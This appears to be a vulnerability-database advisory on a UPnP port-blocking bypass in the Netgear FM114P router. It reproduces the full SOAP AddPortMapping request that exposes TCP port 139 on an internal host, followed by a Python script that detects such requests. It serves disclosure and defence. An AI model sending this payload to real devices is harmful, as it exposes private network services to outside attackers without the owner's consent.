NETGEAR FM114P ProSafe Wireless Router - Rule Bypass

Vulnerability ID 1053807 Vulnerability type
Published 2003-04-03 Updated 2003-04-03
CVE ID N/A CNNVD-ID N/A
Platform Hardware CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/22455
|Vulnerability details
Vulnerability details have not yet been disclosed
|Vulnerability EXP
source: http://www.securityfocus.com/bid/7270/info

The Netgear FM114P allows certain ports to be blocked, both for external users attempting to enter the local network and for local users connecting to the WAN. If Remote Access and Universal Plug and Play are both enabled on the WAN interface, a UPnP SOAP request can cause a connection to be initiated through a port that is normally blocked.

POST /upnp/service/WANPPPConnection HTTP/1.1
Content-Type: text/xml; charset="utf-8"
SOAPAction: "urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"
User-Agent: Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
Host: 192.168.0.1
Content-Length: 1123
Connection: Keep-Alive
Pragma: no-cache

<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="string"></NewRemoteHost>
<NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="ui2">139</NewExternalPort>
<NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="string">TCP</NewProtocol>
<NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="ui2">139</NewInternalPort>
<NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="string">192.168.0.6</NewInternalClient>
<NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="boolean">1</NewEnabled>
<NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="string">NetBios</NewPortMappingDescription>
<NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="ui4">0</NewLeaseDuration>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
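
A detection-side check for the request shown above, as an added example that is not part of the original advisory: it parses a captured UPnP control request and reports AddPortMapping calls that conflict with the port-blocking rules. The BLOCKED set, the LAN range, the function names and the sample source address are assumptions made for illustration.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Assumed policy (not from the advisory): blocked ports and the legitimate LAN range.
BLOCKED = {("TCP", 139), ("TCP", 445)}
LAN = ipaddress.ip_network("192.168.0.0/24")

def parse_add_port_mapping(raw: bytes):
    """Return the unqualified New* arguments of an AddPortMapping call, else None."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if not headers.get("soapaction", "").strip('"').endswith("#AddPortMapping"):
        return None
    if b"<!DOCTYPE" in body:
        raise ValueError("DTD in SOAP body, refusing to parse")
    return {el.tag: (el.text or "").strip()
            for el in ET.fromstring(body.strip()).iter() if el.tag.startswith("New")}

def findings(raw: bytes, source_ip: str):
    """List the ways this control request conflicts with the port-blocking policy."""
    args = parse_add_port_mapping(raw)
    if args is None:
        return []
    out = []
    if ipaddress.ip_address(source_ip) not in LAN:
        out.append(f"control request from non-LAN source {source_ip}")
    proto = args.get("NewProtocol", "").upper()
    for field in ("NewExternalPort", "NewInternalPort"):
        value = args.get(field, "")
        if value.isdigit() and (proto, int(value)) in BLOCKED:
            out.append(f"{field} {proto}/{value} is blocked by policy")
    if args.get("NewRemoteHost") == "":
        out.append("NewRemoteHost empty: mapping accepts any remote host")
    return out

# Constructed sample modeled on the request above (dt:dt attributes dropped).
SAMPLE = (b'POST /upnp/service/WANPPPConnection HTTP/1.1\r\n'
          b'SOAPAction: "urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"\r\n'
          b'\r\n<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
          b'<s:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1">'
          b'<NewRemoteHost></NewRemoteHost><NewExternalPort>139</NewExternalPort>'
          b'<NewProtocol>TCP</NewProtocol><NewInternalPort>139</NewInternalPort>'
          b'<NewInternalClient>192.168.0.6</NewInternalClient>'
          b'</m:AddPortMapping></s:Body></s:Envelope>')

if __name__ == "__main__":
    print("\n".join(findings(SAMPLE, "203.0.113.10")))  # constructed WAN-side source
```

Fed from a proxy or packet capture in front of the control URL, the same check can alert on mappings requested from the WAN side while Remote Access and UPnP are both enabled.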